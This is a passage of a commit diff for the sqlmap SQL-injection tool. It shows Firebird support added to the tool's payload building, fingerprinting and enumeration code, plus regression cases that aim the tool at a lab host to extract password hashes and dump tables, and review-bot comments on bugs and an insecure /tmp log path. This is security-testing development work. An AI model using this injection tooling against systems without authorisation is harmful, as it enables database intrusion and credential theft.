Merge branch 'master' of github.com:sqlmapproject/sqlmap
commit
3f4c010370
|
@ -26,7 +26,7 @@ SMTP_SERVER = "127.0.0.1"
|
||||||
SMTP_PORT = 25
|
SMTP_PORT = 25
|
||||||
SMTP_TIMEOUT = 30
|
SMTP_TIMEOUT = 30
|
||||||
FROM = "regressiontest@sqlmap.org"
|
FROM = "regressiontest@sqlmap.org"
|
||||||
TO = "dev@sqlmap.org"
|
TO = ["bernardo.damele@gmail.com", "miroslav.stampar@gmail.com"]
|
||||||
SUBJECT = "Regression test results on %s using revision %s" % (TIME, REVISION)
|
SUBJECT = "Regression test results on %s using revision %s" % (TIME, REVISION)
|
||||||
|
|
||||||
def prepare_email(content):
|
def prepare_email(content):
|
||||||
|
@ -87,18 +87,23 @@ def main():
|
||||||
|
|
||||||
test_counts.append(test_count)
|
test_counts.append(test_count)
|
||||||
|
|
||||||
console_output_fd = codecs.open(os.path.join(output_folder, "console_output"), "rb", "utf8")
|
console_output_file = os.path.join(output_folder, "console_output")
|
||||||
console_output = console_output_fd.read()
|
log_file = os.path.join(output_folder, "debiandev", "log")
|
||||||
console_output_fd.close()
|
traceback_file = os.path.join(output_folder, "traceback")
|
||||||
|
|
||||||
attachments[test_count] = str(console_output)
|
if os.path.exists(console_output_file):
|
||||||
|
console_output_fd = codecs.open(console_output_file, "rb", "utf8")
|
||||||
|
console_output = console_output_fd.read()
|
||||||
|
console_output_fd.close()
|
||||||
|
attachments[test_count] = str(console_output)
|
||||||
|
|
||||||
log_fd = codecs.open(os.path.join(output_folder, "debiandev", "log"), "rb", "utf8")
|
if os.path.exists(log_file):
|
||||||
log = log_fd.read()
|
log_fd = codecs.open(log_file, "rb", "utf8")
|
||||||
log_fd.close()
|
log = log_fd.read()
|
||||||
|
log_fd.close()
|
||||||
|
|
||||||
if traceback:
|
if os.path.exists(traceback_file):
|
||||||
traceback_fd = codecs.open(os.path.join(output_folder, "traceback"), "rb", "utf8")
|
traceback_fd = codecs.open(traceback_file, "rb", "utf8")
|
||||||
traceback = traceback_fd.read()
|
traceback = traceback_fd.read()
|
||||||
traceback_fd.close()
|
traceback_fd.close()
|
||||||
|
|
||||||
|
|
|
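Review bot: `log` is now assigned only inside `if os.path.exists(log_file):`, so when the file is missing any later use of `log` either raises NameError or, if this code runs once per test, silently reuses the text read for the previous one. Where `log` and `traceback` are consumed is outside the hunk, so this needs checking against the rest of main(); setting `log = None` before the check would make the missing-file case explicit. Each exists-then-open pair would also be tighter as `with codecs.open(log_file, "rb", "utf8") as log_fd:` inside a `try`/`except IOError`, which closes the handle if the read fails and removes the gap between the check and the open.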
@ -6,9 +6,18 @@
|
||||||
SQLMAP_HOME="/opt/sqlmap"
|
SQLMAP_HOME="/opt/sqlmap"
|
||||||
REGRESSION_SCRIPT="${SQLMAP_HOME}/extra/shutils"
|
REGRESSION_SCRIPT="${SQLMAP_HOME}/extra/shutils"
|
||||||
|
|
||||||
|
FROM="regressiontest@sqlmap.org"
|
||||||
|
TO="bernardo.damele@gmail.com, miroslav.stampar@gmail.com"
|
||||||
|
SUBJECT="Automated regression test failed on $(date)"
|
||||||
|
|
||||||
cd $SQLMAP_HOME
|
cd $SQLMAP_HOME
|
||||||
git pull
|
git pull
|
||||||
rm -f output 2>/dev/null
|
rm -f output 2>/dev/null
|
||||||
|
|
||||||
cd $REGRESSION_SCRIPT
|
cd $REGRESSION_SCRIPT
|
||||||
python regressiontest.py
|
python regressiontest.py 1>/tmp/regressiontest.log 2>&1
|
||||||
|
|
||||||
|
if [ $? -ne 0 ]
|
||||||
|
then
|
||||||
|
cat /tmp/regressiontest.log | mailx -s "${SUBJECT}" -aFrom:${FROM} ${TO}
|
||||||
|
fi
|
||||||
|
|
|
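Review bot: The output is redirected to the fixed path `/tmp/regressiontest.log`, and a predictable name in a world-writable directory lets any other local account pre-create it (for instance as a link to another file) before the job runs, so the redirect can overwrite an unintended file and the mailed report can be altered. Creating the file with `LOG="$(mktemp)"` and using `"$LOG"` in both the redirect and the `cat` removes the predictable name; an `rm -f "$LOG"` after the `fi` keeps old logs from accumulating. `${FROM}` in `-aFrom:${FROM}` is also unquoted, whereas `${TO}` appears to be left unquoted on purpose so that it splits into two recipients.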
@ -535,7 +535,7 @@ class Agent(object):
|
||||||
elif fieldsNoSelect:
|
elif fieldsNoSelect:
|
||||||
concatenatedQuery = "CONCAT('%s',%s,'%s')" % (kb.chars.start, concatenatedQuery, kb.chars.stop)
|
concatenatedQuery = "CONCAT('%s',%s,'%s')" % (kb.chars.start, concatenatedQuery, kb.chars.stop)
|
||||||
|
|
||||||
elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE, DBMS.SQLITE, DBMS.DB2):
|
elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE, DBMS.SQLITE, DBMS.DB2, DBMS.FIREBIRD):
|
||||||
if fieldsExists:
|
if fieldsExists:
|
||||||
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
|
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
|
||||||
concatenatedQuery += "||'%s'" % kb.chars.stop
|
concatenatedQuery += "||'%s'" % kb.chars.stop
|
||||||
|
@ -822,8 +822,7 @@ class Agent(object):
|
||||||
limitedQuery += " %s" % limitStr
|
limitedQuery += " %s" % limitStr
|
||||||
|
|
||||||
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
|
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
|
||||||
if " ORDER BY " in limitedQuery and "(SELECT " in limitedQuery:
|
if " ORDER BY " in limitedQuery and "SELECT " in limitedQuery:
|
||||||
orderBy = limitedQuery[limitedQuery.index(" ORDER BY "):]
|
|
||||||
limitedQuery = limitedQuery[:limitedQuery.index(" ORDER BY ")]
|
limitedQuery = limitedQuery[:limitedQuery.index(" ORDER BY ")]
|
||||||
|
|
||||||
if query.startswith("SELECT "):
|
if query.startswith("SELECT "):
|
||||||
|
@ -831,6 +830,7 @@ class Agent(object):
|
||||||
limitedQuery = "%s FROM (%s,%s" % (untilFrom, untilFrom.replace(delimiter, ','), limitStr)
|
limitedQuery = "%s FROM (%s,%s" % (untilFrom, untilFrom.replace(delimiter, ','), limitStr)
|
||||||
else:
|
else:
|
||||||
limitedQuery = "%s FROM (SELECT %s,%s" % (untilFrom, ','.join(f for f in field), limitStr)
|
limitedQuery = "%s FROM (SELECT %s,%s" % (untilFrom, ','.join(f for f in field), limitStr)
|
||||||
|
|
||||||
limitedQuery = limitedQuery % fromFrom
|
limitedQuery = limitedQuery % fromFrom
|
||||||
limitedQuery += "=%d" % (num + 1)
|
limitedQuery += "=%d" % (num + 1)
|
||||||
|
|
||||||
|
|
|
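Review bot: With the test relaxed from `"(SELECT "` to `"SELECT "`, the second half of `if " ORDER BY " in limitedQuery and "SELECT " in limitedQuery:` is true for practically every query that reaches the Oracle/DB2 branch, so the condition is effectively just the ORDER BY test and would read more honestly written that way. The slice below it uses `limitedQuery.index(" ORDER BY ")`, which cuts at the first occurrence; if an ORDER BY can appear inside a nested subselect the query would be truncated in the middle of that subselect, so a short comment stating that only a trailing ORDER BY is expected (or a switch to `rindex`) would help. The enclosing method starts and ends outside the hunks.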
@ -175,7 +175,8 @@ class Dump(object):
|
||||||
for setting in settings:
|
for setting in settings:
|
||||||
self._write(" %s: %s" % (subHeader, setting))
|
self._write(" %s: %s" % (subHeader, setting))
|
||||||
|
|
||||||
self.singleString("")
|
if userSettings:
|
||||||
|
self.singleString("")
|
||||||
|
|
||||||
def dbs(self, dbs):
|
def dbs(self, dbs):
|
||||||
self.lister("available databases", dbs)
|
self.lister("available databases", dbs)
|
||||||
|
|
|
@ -167,6 +167,9 @@ def liveTest():
|
||||||
|
|
||||||
result = runCase(switches, parse)
|
result = runCase(switches, parse)
|
||||||
|
|
||||||
|
test_case_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "test_case"), "wb", UNICODE_ENCODING)
|
||||||
|
test_case_fd.write("%s\n" % name)
|
||||||
|
|
||||||
if result:
|
if result:
|
||||||
logger.info("test passed")
|
logger.info("test passed")
|
||||||
cleanCase()
|
cleanCase()
|
||||||
|
@ -183,6 +186,7 @@ def liveTest():
|
||||||
errMsg += " - SQL injection not detected"
|
errMsg += " - SQL injection not detected"
|
||||||
|
|
||||||
logger.error(errMsg)
|
logger.error(errMsg)
|
||||||
|
test_case_fd.write("%s\n" % errMsg)
|
||||||
|
|
||||||
if failedParseOn:
|
if failedParseOn:
|
||||||
console_output_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "console_output"), "wb", UNICODE_ENCODING)
|
console_output_fd = codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "console_output"), "wb", UNICODE_ENCODING)
|
||||||
|
@ -199,6 +203,7 @@ def liveTest():
|
||||||
if conf.stopFail is True:
|
if conf.stopFail is True:
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
|
test_case_fd.close()
|
||||||
retVal &= bool(result)
|
retVal &= bool(result)
|
||||||
|
|
||||||
dataToStdout("\n")
|
dataToStdout("\n")
|
||||||
|
|
|
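Review bot: `test_case_fd` is opened right after `runCase()` but the only `test_case_fd.close()` sits after the `if conf.stopFail is True:` / `return retVal` exit, so a run that stops on the first failure returns with the handle open and the `errMsg` line possibly not yet flushed to disk. Wrapping the writes in `with codecs.open(os.path.join(paths.SQLMAP_OUTPUT_PATH, "test_case"), "wb", UNICODE_ENCODING) as test_case_fd:` or calling `test_case_fd.close()` before `return retVal` fixes that. On the passing path `cleanCase()` also runs while the file is still open; what it removes is outside the hunk, so whether that matters needs confirming. Indentation is lost on this page, so the exact nesting of the close is inferred from line order.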
@ -23,6 +23,7 @@ from lib.core.common import incrementCounter
|
||||||
from lib.core.common import initTechnique
|
from lib.core.common import initTechnique
|
||||||
from lib.core.common import isListLike
|
from lib.core.common import isListLike
|
||||||
from lib.core.common import isNumPosStrValue
|
from lib.core.common import isNumPosStrValue
|
||||||
|
from lib.core.common import isTechniqueAvailable
|
||||||
from lib.core.common import listToStrValue
|
from lib.core.common import listToStrValue
|
||||||
from lib.core.common import readInput
|
from lib.core.common import readInput
|
||||||
from lib.core.common import unArrayizeValue
|
from lib.core.common import unArrayizeValue
|
||||||
|
@ -34,6 +35,7 @@ from lib.core.data import logger
|
||||||
from lib.core.data import queries
|
from lib.core.data import queries
|
||||||
from lib.core.dicts import FROM_DUMMY_TABLE
|
from lib.core.dicts import FROM_DUMMY_TABLE
|
||||||
from lib.core.enums import DBMS
|
from lib.core.enums import DBMS
|
||||||
|
from lib.core.enums import PAYLOAD
|
||||||
from lib.core.settings import CHECK_ZERO_COLUMNS_THRESHOLD
|
from lib.core.settings import CHECK_ZERO_COLUMNS_THRESHOLD
|
||||||
from lib.core.settings import MYSQL_ERROR_CHUNK_LENGTH
|
from lib.core.settings import MYSQL_ERROR_CHUNK_LENGTH
|
||||||
from lib.core.settings import MSSQL_ERROR_CHUNK_LENGTH
|
from lib.core.settings import MSSQL_ERROR_CHUNK_LENGTH
|
||||||
|
@ -180,6 +182,9 @@ def _errorFields(expression, expressionFields, expressionFieldsList, num=None, e
|
||||||
else:
|
else:
|
||||||
expressionReplaced = expression.replace(expressionFields, field, 1)
|
expressionReplaced = expression.replace(expressionFields, field, 1)
|
||||||
|
|
||||||
|
if kb.technique == PAYLOAD.TECHNIQUE.QUERY and Backend.isDbms(DBMS.FIREBIRD) and expressionReplaced.startswith("SELECT "):
|
||||||
|
expressionReplaced = "SELECT %s" % agent.concatQuery(expressionReplaced)
|
||||||
|
|
||||||
output = NULL if emptyFields and field in emptyFields else _oneShotErrorUse(expressionReplaced, field)
|
output = NULL if emptyFields and field in emptyFields else _oneShotErrorUse(expressionReplaced, field)
|
||||||
|
|
||||||
if not kb.threadContinue:
|
if not kb.threadContinue:
|
||||||
|
|
|
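Review bot: The Firebird branch added to `_errorFields` carries no comment explaining why an inline-query expression that starts with `SELECT ` has to be passed through `agent.concatQuery` again before `_oneShotErrorUse`. A one-line comment above the `if`, for example `# Firebird inline queries: re-wrap the per-field SELECT so the value is delimited by kb.chars.start/stop`, would record the intent, assuming that is what the wrapping is for. The newly imported `isTechniqueAvailable` is not used in any hunk shown here; if it is not used elsewhere in the file the import should be dropped.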
@ -74,6 +74,7 @@ class Fingerprint(GenericFingerprint):
|
||||||
("1.5", ("NULLIF(%d,%d) IS NULL", "EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)")),
|
("1.5", ("NULLIF(%d,%d) IS NULL", "EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)")),
|
||||||
("2.0", ("EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)", "BIT_LENGTH(%d)>0", "CHAR_LENGTH(%d)>0")),
|
("2.0", ("EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)", "BIT_LENGTH(%d)>0", "CHAR_LENGTH(%d)>0")),
|
||||||
("2.1", ("BIN_XOR(%d,%d)=0", "PI()>0.%d", "RAND()<1.%d", "FLOOR(1.%d)>=0")),
|
("2.1", ("BIN_XOR(%d,%d)=0", "PI()>0.%d", "RAND()<1.%d", "FLOOR(1.%d)>=0")),
|
||||||
|
# TODO: add test for Firebird 2.5
|
||||||
)
|
)
|
||||||
|
|
||||||
for i in xrange(len(table)):
|
for i in xrange(len(table)):
|
||||||
|
@ -122,7 +123,7 @@ class Fingerprint(GenericFingerprint):
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
randInt = randomInt()
|
randInt = randomInt()
|
||||||
result = inject.checkBooleanExpression("EXISTS(SELECT * FROM RDB$DATABASE WHERE %d=%d)" % (randInt, randInt))
|
result = inject.checkBooleanExpression("(SELECT COUNT(*) FROM RDB$DATABASE WHERE %d=%d)>0" % (randInt, randInt))
|
||||||
|
|
||||||
if result:
|
if result:
|
||||||
infoMsg = "confirming %s" % DBMS.FIREBIRD
|
infoMsg = "confirming %s" % DBMS.FIREBIRD
|
||||||
|
|
|
@ -16,6 +16,9 @@ class Syntax(GenericSyntax):
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def escape(expression, quote=True):
|
def escape(expression, quote=True):
|
||||||
if isDBMSVersionAtLeast('2.1'):
|
if isDBMSVersionAtLeast('2.1'):
|
||||||
|
if expression == u"'''":
|
||||||
|
return "ASCII_CHAR(%d)" % (ord("'"))
|
||||||
|
|
||||||
if quote:
|
if quote:
|
||||||
while True:
|
while True:
|
||||||
index = expression.find("'")
|
index = expression.find("'")
|
||||||
|
|
|
@ -41,7 +41,7 @@ class Connector(GenericConnector):
|
||||||
|
|
||||||
try:
|
try:
|
||||||
self.connector = pymssql.connect(host="%s:%d" % (self.hostname, self.port), user=self.user, password=self.password, database=self.db, login_timeout=conf.timeout, timeout=conf.timeout)
|
self.connector = pymssql.connect(host="%s:%d" % (self.hostname, self.port), user=self.user, password=self.password, database=self.db, login_timeout=conf.timeout, timeout=conf.timeout)
|
||||||
except pymssql.OperationalError, msg:
|
except (pymssql.InterfaceError, pymssql.OperationalError), msg:
|
||||||
raise SqlmapConnectionException(msg)
|
raise SqlmapConnectionException(msg)
|
||||||
|
|
||||||
self.initCursor()
|
self.initCursor()
|
||||||
|
|
|
@ -513,22 +513,24 @@ class Databases:
|
||||||
query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db))
|
query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db))
|
||||||
query += condQuery
|
query += condQuery
|
||||||
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
|
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
|
||||||
query = rootQuery.inband.query % unsafeSQLIdentificatorNaming(tbl.upper())
|
query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper()))
|
||||||
query += condQuery
|
query += condQuery
|
||||||
elif Backend.isDbms(DBMS.MSSQL):
|
elif Backend.isDbms(DBMS.MSSQL):
|
||||||
query = rootQuery.inband.query % (conf.db, conf.db, conf.db, conf.db,
|
query = rootQuery.inband.query % (conf.db, conf.db, conf.db, conf.db,
|
||||||
conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1])
|
conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1])
|
||||||
query += condQuery.replace("[DB]", conf.db)
|
query += condQuery.replace("[DB]", conf.db)
|
||||||
elif Backend.isDbms(DBMS.SQLITE):
|
elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD):
|
||||||
query = rootQuery.inband.query % tbl
|
query = rootQuery.inband.query % tbl
|
||||||
|
|
||||||
values = inject.getValue(query, blind=False, time=False)
|
values = inject.getValue(query, blind=False, time=False)
|
||||||
|
|
||||||
if Backend.isDbms(DBMS.MSSQL) and isNoneValue(values):
|
if Backend.isDbms(DBMS.MSSQL) and isNoneValue(values):
|
||||||
index, values = 1, []
|
index, values = 1, []
|
||||||
|
|
||||||
while True:
|
while True:
|
||||||
query = rootQuery.inband.query2 % (conf.db, tbl, index)
|
query = rootQuery.inband.query2 % (conf.db, tbl, index)
|
||||||
value = unArrayizeValue(inject.getValue(query, blind=False, time=False))
|
value = unArrayizeValue(inject.getValue(query, blind=False, time=False))
|
||||||
|
|
||||||
if isNoneValue(value) or value == " ":
|
if isNoneValue(value) or value == " ":
|
||||||
break
|
break
|
||||||
else:
|
else:
|
||||||
|
@ -591,7 +593,7 @@ class Databases:
|
||||||
query += condQuery
|
query += condQuery
|
||||||
|
|
||||||
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
|
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
|
||||||
query = rootQuery.blind.count % unsafeSQLIdentificatorNaming(tbl.upper())
|
query = rootQuery.blind.count % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper()))
|
||||||
query += condQuery
|
query += condQuery
|
||||||
|
|
||||||
elif Backend.isDbms(DBMS.MSSQL):
|
elif Backend.isDbms(DBMS.MSSQL):
|
||||||
|
@ -639,7 +641,7 @@ class Databases:
|
||||||
query += condQuery
|
query += condQuery
|
||||||
field = None
|
field = None
|
||||||
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
|
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
|
||||||
query = rootQuery.blind.query % unsafeSQLIdentificatorNaming(tbl.upper())
|
query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper()))
|
||||||
query += condQuery
|
query += condQuery
|
||||||
field = None
|
field = None
|
||||||
elif Backend.isDbms(DBMS.MSSQL):
|
elif Backend.isDbms(DBMS.MSSQL):
|
||||||
|
@ -659,7 +661,7 @@ class Databases:
|
||||||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
|
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
|
||||||
query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl), column, unsafeSQLIdentificatorNaming(conf.db))
|
query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl), column, unsafeSQLIdentificatorNaming(conf.db))
|
||||||
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
|
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
|
||||||
query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl.upper()), column)
|
query = rootQuery.blind.query2 % (unsafeSQLIdentificatorNaming(tbl.upper()), column, unsafeSQLIdentificatorNaming(conf.db.upper()))
|
||||||
elif Backend.isDbms(DBMS.MSSQL):
|
elif Backend.isDbms(DBMS.MSSQL):
|
||||||
query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, column, conf.db,
|
query = rootQuery.blind.query2 % (conf.db, conf.db, conf.db, conf.db, column, conf.db,
|
||||||
conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1])
|
conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1])
|
||||||
|
@ -736,7 +738,11 @@ class Databases:
|
||||||
db = db.upper()
|
db = db.upper()
|
||||||
table = table.upper()
|
table = table.upper()
|
||||||
|
|
||||||
query = "SELECT %s FROM %s.%s" % (queries[Backend.getIdentifiedDbms()].count.query % '*', safeSQLIdentificatorNaming(db), safeSQLIdentificatorNaming(table, True))
|
if Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD):
|
||||||
|
query = "SELECT %s FROM %s" % (queries[Backend.getIdentifiedDbms()].count.query % '*', safeSQLIdentificatorNaming(table, True))
|
||||||
|
else:
|
||||||
|
query = "SELECT %s FROM %s.%s" % (queries[Backend.getIdentifiedDbms()].count.query % '*', safeSQLIdentificatorNaming(db), safeSQLIdentificatorNaming(table, True))
|
||||||
|
|
||||||
count = inject.getValue(query, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
count = inject.getValue(query, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||||
|
|
||||||
if isNumPosStrValue(count):
|
if isNumPosStrValue(count):
|
||||||
|
@ -759,7 +765,7 @@ class Databases:
|
||||||
if not conf.db:
|
if not conf.db:
|
||||||
conf.db, conf.tbl = conf.tbl.split(".")
|
conf.db, conf.tbl = conf.tbl.split(".")
|
||||||
|
|
||||||
if conf.tbl is not None and conf.db is None:
|
if conf.tbl is not None and conf.db is None and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD):
|
||||||
warnMsg = "missing database parameter. sqlmap is going to "
|
warnMsg = "missing database parameter. sqlmap is going to "
|
||||||
warnMsg += "use the current database to retrieve the "
|
warnMsg += "use the current database to retrieve the "
|
||||||
warnMsg += "number of entries for table '%s'" % unsafeSQLIdentificatorNaming(conf.tbl)
|
warnMsg += "number of entries for table '%s'" % unsafeSQLIdentificatorNaming(conf.tbl)
|
||||||
|
|
|
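Review bot: The Oracle/DB2 branches now call `conf.db.upper()` in four places (the inband query, `blind.count`, `blind.query` and `blind.query2`), and each raises AttributeError when `conf.db` is None. The last hunk of this file tests `conf.tbl is not None and conf.db is None`, so a missing database name is a state the class does expect; whether `conf.db` is always filled in before the column-enumeration branches is outside the hunks. Resolving the database name once before the DBMS dispatch (falling back to the current database, as the warning text in the last hunk describes) and upper-casing that local value would avoid both the crash and the four repeated `unsafeSQLIdentificatorNaming(conf.db.upper())` expressions.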
@ -29,6 +29,7 @@ from lib.core.enums import PAYLOAD
|
||||||
from lib.core.exception import SqlmapMissingMandatoryOptionException
|
from lib.core.exception import SqlmapMissingMandatoryOptionException
|
||||||
from lib.core.exception import SqlmapUserQuitException
|
from lib.core.exception import SqlmapUserQuitException
|
||||||
from lib.core.settings import CURRENT_DB
|
from lib.core.settings import CURRENT_DB
|
||||||
|
from lib.core.settings import METADB_SUFFIX
|
||||||
from lib.request import inject
|
from lib.request import inject
|
||||||
from lib.techniques.brute.use import columnExists
|
from lib.techniques.brute.use import columnExists
|
||||||
from lib.techniques.brute.use import tableExists
|
from lib.techniques.brute.use import tableExists
|
||||||
|
@ -199,7 +200,7 @@ class Search:
|
||||||
if isinstance(values, basestring):
|
if isinstance(values, basestring):
|
||||||
values = [values]
|
values = [values]
|
||||||
for value in values:
|
for value in values:
|
||||||
newValues.append(["SQLite_masterdb", value])
|
newValues.append(["SQLite_%s" % METADB_SUFFIX, value])
|
||||||
|
|
||||||
values = newValues
|
values = newValues
|
||||||
|
|
||||||
|
@ -258,7 +259,7 @@ class Search:
|
||||||
if tblConsider == "2":
|
if tblConsider == "2":
|
||||||
continue
|
continue
|
||||||
else:
|
else:
|
||||||
foundTbls["SQLite_masterdb"] = []
|
foundTbls["SQLite_%s" % METADB_SUFFIX] = []
|
||||||
|
|
||||||
for db in foundTbls.keys():
|
for db in foundTbls.keys():
|
||||||
db = safeSQLIdentificatorNaming(db)
|
db = safeSQLIdentificatorNaming(db)
|
||||||
|
|
|
@ -888,6 +888,217 @@
|
||||||
<item value="r'Database: SQLite_masterdb.+Table: users.+5 entries.+luther.+nameisnull.+'"/>
|
<item value="r'Database: SQLite_masterdb.+Table: users.+5 entries.+luther.+nameisnull.+'"/>
|
||||||
</parse>
|
</parse>
|
||||||
</case>
|
</case>
|
||||||
|
<case name="Firebird boolean-based multi-threaded enumeration - all entries">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/firebird/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="B"/>
|
||||||
|
<extensiveFp value="True"/>
|
||||||
|
<getBanner value="True"/>
|
||||||
|
<getCurrentUser value="True"/>
|
||||||
|
<getCurrentDb value="True"/>
|
||||||
|
<getHostname value="True"/>
|
||||||
|
<isDba value="True"/>
|
||||||
|
<getUsers value="True"/>
|
||||||
|
<getPasswordHashes value="True"/>
|
||||||
|
<getPrivileges value="True"/>
|
||||||
|
<getRoles value="True"/>
|
||||||
|
<getDbs value="True"/>
|
||||||
|
<getTables value="True"/>
|
||||||
|
<getColumns value="True"/>
|
||||||
|
<getCount value="True"/>
|
||||||
|
<dumpTable value="True"/>
|
||||||
|
<tbl value="users"/>
|
||||||
|
<excludeSysDbs value="True"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="Title: AND boolean-based blind - WHERE or HAVING clause"/>
|
||||||
|
<item value="r'back-end DBMS: active fingerprint: Firebird 2.1 \(dialect 3\)'"/>
|
||||||
|
<item value="banner: '2.5.0'"/>
|
||||||
|
<item value="current user: 'SYSDBA'"/>
|
||||||
|
<item value="r'current database: '/'"/>
|
||||||
|
<item value="current user is DBA: True"/>
|
||||||
|
<item value="r'database management system users \[.+PUBLIC.+SYSDBA'"/>
|
||||||
|
<item value="r'database management system users privileges:.+PUBLIC.+privilege: SELECT.+SYSDBA.+privilege: DELETE.+privilege: UPDATE'"/>
|
||||||
|
<item value="r'database management system users roles:.+PUBLIC.+role: SELECT.+SYSDBA.+role: DELETE.+role: UPDATE'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+1 table.+USERS'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+Table: USERS.+3 columns.+SURNAME.+VARCHAR'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+Table.+Entries.+USERS.+5'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+Table: USERS.+5 entries.+luther.+nameisnull.+'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<!-- TODO: this test case fails because of issue #358 -->
|
||||||
|
<case name="Firebird error-based multi-threaded enumeration - all entries">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/firebird/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="E"/>
|
||||||
|
<extensiveFp value="True"/>
|
||||||
|
<getBanner value="True"/>
|
||||||
|
<getCurrentUser value="True"/>
|
||||||
|
<getCurrentDb value="True"/>
|
||||||
|
<getHostname value="True"/>
|
||||||
|
<isDba value="True"/>
|
||||||
|
<getUsers value="True"/>
|
||||||
|
<getPasswordHashes value="True"/>
|
||||||
|
<getPrivileges value="True"/>
|
||||||
|
<getRoles value="True"/>
|
||||||
|
<getDbs value="True"/>
|
||||||
|
<getTables value="True"/>
|
||||||
|
<getColumns value="True"/>
|
||||||
|
<getCount value="True"/>
|
||||||
|
<dumpTable value="True"/>
|
||||||
|
<tbl value="users"/>
|
||||||
|
</switches>
|
||||||
|
<parse>
|
||||||
|
<item value="Title: AND boolean-based blind - WHERE or HAVING clause"/>
|
||||||
|
<item value="r'back-end DBMS: active fingerprint: Firebird 2.1 \(dialect 3\)'"/>
|
||||||
|
<item value="banner: '2.5.0'"/>
|
||||||
|
<item value="current user: 'SYSDBA'"/>
|
||||||
|
<item value="r'current database: '/'"/>
|
||||||
|
<item value="current user is DBA: True"/>
|
||||||
|
<item value="r'database management system users \[.+PUBLIC.+SYSDBA'"/>
|
||||||
|
<item value="r'database management system users privileges:.+PUBLIC.+privilege: SELECT.+SYSDBA.+privilege: DELETE.+privilege: UPDATE'"/>
|
||||||
|
<item value="r'database management system users roles:.+PUBLIC.+role: SELECT.+SYSDBA.+role: DELETE.+role: UPDATE'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+1 table.+USERS'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+Table: USERS.+3 columns.+SURNAME.+VARCHAR'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+Table.+Entries.+USERS.+5'"/>
|
||||||
|
<item value="r'Database: Firebird_masterdb.+Table: USERS.+5 entries.+luther.+nameisnull.+'"/>
|
||||||
|
</parse>
|
||||||
|
</case>
|
||||||
|
<!-- TODO: this test case fails because of issue #357 -->
|
||||||
|
<case name="Firebird UNION query multi-threaded enumeration - all entries">
|
||||||
|
<switches>
|
||||||
|
<url value="http://debiandev/sqlmap/firebird/get_int.php?id=1"/>
|
||||||
|
<threads value="4"/>
|
||||||
|
<tech value="U"/>
|
||||||
|
<extensiveFp value="True"/>
|
||||||
|
<getBanner value="True"/>
|
||||||
|
<getCurrentUser value="True"/>
|
||||||
|
<getCurrentDb value="True"/>
|
||||||
|
<getHostname value="True"/>
|
